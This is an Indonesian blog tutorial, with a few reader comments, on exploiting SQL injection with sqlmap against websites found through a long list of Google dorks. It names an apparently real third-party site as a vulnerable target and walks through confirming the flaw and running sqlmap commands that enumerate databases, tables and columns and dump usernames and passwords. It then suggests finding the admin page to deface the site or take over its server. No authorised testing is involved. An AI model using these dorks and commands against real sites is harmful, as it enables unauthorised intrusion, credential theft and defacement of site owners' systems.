Tutorial Sql Injection Dengan SQLMAP Kali Linux

Oleh Unknown

Sunday 1 June 2014

Tutorial Sql Injection Dengan SQLMAP Kali Linux - SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter,jadi hacker dapat dengan mudah mendapatkan data dari website targetnya.

SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.

oke setelah melihat tentang penjelasan tersebut kita akan langsung coba praktekan oke Tutorial Sql Injection Dengan SQLMAP Kali Linux

Tutorial Sql Injection Dengan SQLMAP Kali Linux

pertama yang harus anda lakukan adalah mencari target website yang vuln sql injection dengan menggunakan dork dibawah ini,copy paste dork ni di google

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: filesize()

lalu setelah mendapatkan target kita coba tambahkan tanda ' pada ujung addres bar website target disini saya mempunyai website dengan bug sql injection yaitu http://www.woodbridgeparty.com/products.php?id=111 setelah itu saya coba tambahkan tanda petik di ujung angka 111 seperti ini http://www.woodbridgeparty.com/products.php?id=111' maka akan ada error berarti web itu vuln sql injection dan kita bisa lanjutakan tahap berikutnya yaitu menginject bug tersebut dengan sqlmap

setelah itu buka terminal dan masukan perintah berikut :
sqlmap -u http://website-target.com/contoh.php?id=1 --dbs silahkan ganti website target sesuai website yang kita inject yang memiliki bug sql injection seperti diatas

Tutorial Sql Injection Dengan SQLMAP Kali Linux

setalah itu tekan enter dan tunggu sampai sqlmap mendapatkan informasi database target proses ini kira kira sekitar 5 menit tergantu koneksi anda, setelah selesai kita akan mendapatkan database target maka langkah selanjutnya menampilkan tables database tersebut denga perintah :
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase --tables

setelah itu tekan enter dan tunggu beberapa saat sampai sqlmap mendapatkan tables dari database website tersebut jika sudah maka akan tampil tables database website tersebut langkah selanjutnya kita jalankan perintah untuk mengetahui isi columns dari tables database tersebut dengan perintah :
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase -T namatables --columns

tunggu beberapa saat sampai sqlmap menampilkna data columns dari tables databas web tersebut setelah mendapatkan columns database tersebut langkah terakhir kita hanya perlu men dump data columns tersebut dengan perintah :

sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase -T namatables -C namacolumn,namacolumn2 --dump

tunggu beberapa saat sampai sqlmap berhasil mendump data columns database tersebut setelah selesai maka kita akan mendapatkan data web tersebut

dan akhirnya kita mendapatkan user dan pass web tersebut

tinggal kita kembangkan lagi sesuai keinginan kita contoh nya kita ingin dump table lain kita tinggal ganti nama tables nya dan kesananya sama saja setelah sampai tahap ini tinggal kita cari halaman admin web tersebut terserah deh web itu mau di apain ntah itu di deface di ambil server nya dan lain lain saya di sini cuman share ilmu yang saya miliki saja selebihnya jika di salahgunakan itu bukan tanggung jawab saya . sekian Tutorial Sql Injection Dengan SQLMAP Kali Linux kali ini semoga bermanfaat

Terimakasih

11 Komentar untuk "Tutorial Sql Injection Dengan SQLMAP Kali Linux"

Balas

Unknown

21 June 2014 at 00:00

:-d

Anonymous

27 February 2015 at 06:55

cara login ke adminya gimana gan >??

Test

6 March 2015 at 17:07

:d =p~ (h)

12 April 2015 at 21:43

Ajiiip postingannya sob :)
sebagai newbie yang baru belajar.. tolong postingnya ditambah lagi sob..
coz banyak yang belum ane paham sama sofware di kali linux :)
Kalo bisa per sofware ya sob Requesst mohon di accept yah